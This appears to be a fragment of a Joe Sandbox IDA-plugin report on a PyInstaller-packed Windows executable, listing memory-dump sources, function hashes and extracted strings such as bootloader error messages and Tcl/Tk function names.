                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                        • Opcode ID: d5122b7aff0e10d146bffe79506b726acaac58846df22bdc99709fd59aa8d240
                                                                                                                                                                                                                                                        • Instruction ID: 91fecc791a5ceea50f77d13232ee515153d65363e00aa235ff2f9c210cf886ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5122b7aff0e10d146bffe79506b726acaac58846df22bdc99709fd59aa8d240
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D112A62B16F019AEB00DF64E8642B833A4FB1D758F441E35DB6D86BA4EF7CD1648340
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: memcpy_s
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1502251526-0
                                                                                                                                                                                                                                                        • Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                                                                                                                                                                        • Instruction ID: de09b709649a40519a437a782aa618a03990a18a2ad5ca0d0d1335ec050437cb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BC128B2B1A68A87EB24CF5DE05466AB791F788B84F458135DB4E83754EF3DE800CB40
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                        • API String ID: 0-1127688429
                                                                                                                                                                                                                                                        • Opcode ID: b4bf022b898153f2a381bcd878a50a5d3c06b36ca84da26d2d0edcb3d1e551c0
                                                                                                                                                                                                                                                        • Instruction ID: be87021cba55471a64feb8b347fe15805716fb1c10986716e3cb897f0959ff60
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4bf022b898153f2a381bcd878a50a5d3c06b36ca84da26d2d0edcb3d1e551c0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43F19172A1A3D58BE7A58F15C088A3A7AE9FF48744F05C538DB49877A0EF78E950C740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 15204871-0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $
                                                                                                                                                                                                                                                        • API String ID: 0-227171996
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                        • API String ID: 0-900081337
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                                                                                                        • API String ID: 0-3030954782
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: gfffffff
                                                                                                                                                                                                                                                        • API String ID: 0-1523873471
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: TMP
                                                                                                                                                                                                                                                        • API String ID: 3215553584-3125297090
APIs
Memory Dump Source
• Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 56ef1490d9aa7cb50fdbcb208ea1e35327a83dacbd264ffe23c56c6782292f60
                                                                                                                                                                                                                                                        • Instruction ID: 58b25dc57740ff080c66307563b8f109dacef3902601a711fa1f8d602959786c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56ef1490d9aa7cb50fdbcb208ea1e35327a83dacbd264ffe23c56c6782292f60
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87B16D72A0A78686E7658F39C05027C3BA0E75DB48F684235CB4E873A5EF39DA41C749
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2a05c6059b1d422c1c0961fd67960772ff2ba502e6a05041136868912dff4d23
                                                                                                                                                                                                                                                        • Instruction ID: c837e35905c19c59fe0d1b2875a6d58197b212e59e04bd3f5cbe618d03ee8dad
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a05c6059b1d422c1c0961fd67960772ff2ba502e6a05041136868912dff4d23
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1581E472A0978186EB74CB19A4403BA6690FB4D794F544339DB9D87BA9EF3ED6008B04
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3b300af1d1946d5df55db44b3d4e0876ae34829a82d49cb6751e26c04e9c1898
                                                                                                                                                                                                                                                        • Instruction ID: b2e4e69788ce047722bbbcdebdd33a1080c33ad95971e55814c09db8b61f92d7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b300af1d1946d5df55db44b3d4e0876ae34829a82d49cb6751e26c04e9c1898
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7517077B1AA5186E7348B29C04073937A0EB4DB58F244231CF4D977A5EF3AEA82C744
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7c9c7dfd85d7e05c9dc9b7e40d932aad9843605f203f1a6a08d3cc10701c718b
                                                                                                                                                                                                                                                        • Instruction ID: f15209dca46eddf2d2c4326400d98186d31b6526239ad85498153f40be0f139b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c9c7dfd85d7e05c9dc9b7e40d932aad9843605f203f1a6a08d3cc10701c718b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F51A536A1965586E7248B29C04063C37A0FB4CB58F244236CF4E977B4EF3AE943D784
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7710b6301a9c53c0f35ccf6fc131232db227f89fb6367f1206a3fe51f4b04988
                                                                                                                                                                                                                                                        • Instruction ID: 3de5400b86d4ec040e3e0eb84d6e8e1062e4ee9041175a695b36309b718436b5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7710b6301a9c53c0f35ccf6fc131232db227f89fb6367f1206a3fe51f4b04988
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E517676A1A65186E7248B29C04423937A0EB4DB58F284231CF4F977B5EF3AED43D784
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                        • Instruction ID: 7ba301c73d2275eb336fd1c98fce87a814beb50c3233283d9e1e1dfd64a755a7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B41A4D3C0BA9A04E995891C45046F42690DF2ABA0D5C57B4DF9DA33F7FD0E67C6D208
Memory Dump Source
• Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 47026fad3db46e1691e12129f37de500b9ca6af24d2cbfa86880e77cbf706e66
                                                                                                                                                                                                                                                        • Instruction ID: 850b2443a09e76f890df361ef882b9f88695a12cfb6163807bb01c75d8fdfa7c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47026fad3db46e1691e12129f37de500b9ca6af24d2cbfa86880e77cbf706e66
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5F044716296D58ADB948F69A4526297BE0F7083C0B908039D689C3E14DA7C90618F04
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0095cffb8fe81db1077c877ec2d194bac0958fa6bcac770c2119ba444bc36b37
                                                                                                                                                                                                                                                        • Instruction ID: 3bf72b2cd6f0057082d47e78a926563c8e829ea896e4248ab31ee383c72fc16e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0095cffb8fe81db1077c877ec2d194bac0958fa6bcac770c2119ba444bc36b37
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DBA001A190A842E0F6449B15A9611202260FB58341B400032E26D810B1BF2CA4108200
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                        • Opcode ID: 3ce57ac688b021c07c17bb9d18c3d2db368ff9ca427b7eb3b8bd4dc412038eb8
                                                                                                                                                                                                                                                        • Instruction ID: fea85ef6b151b2fb5ac4dd73cce8769292f754cac388a75dc9271021e2d45f75
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ce57ac688b021c07c17bb9d18c3d2db368ff9ca427b7eb3b8bd4dc412038eb8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B02D8A4E4FB4BA0FA15DBADB8641B423A0FF0C785B851475DA4E86274FF7DB45AC200
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA48950: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6ABA43A04,00000000,00007FF6ABA41965), ref: 00007FF6ABA48989
                                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6ABA47CF7,FFFFFFFF,00000000,?,00007FF6ABA43101), ref: 00007FF6ABA4766C
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMultiStringsWide
                                                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                        • API String ID: 2001182103-930877121
                                                                                                                                                                                                                                                        • Opcode ID: b30a72d36afce0cd8273f42ba79e9994321ef07812378637c8fd6fc8c555bb8b
                                                                                                                                                                                                                                                        • Instruction ID: 03d5ba51cecd66c75d5b0f50789bba356e1da8a481beae76a44b8eae72a6a07a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b30a72d36afce0cd8273f42ba79e9994321ef07812378637c8fd6fc8c555bb8b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08517661B2F6C251FB50EB29E8616BA6251EF9C780F840432DB4EC26F6FE3CE5058740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                        • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                        • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
